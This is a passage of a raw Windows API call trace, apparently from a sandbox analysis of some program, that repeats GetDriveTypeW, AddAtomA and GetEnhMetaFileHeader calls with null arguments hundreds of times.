[0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 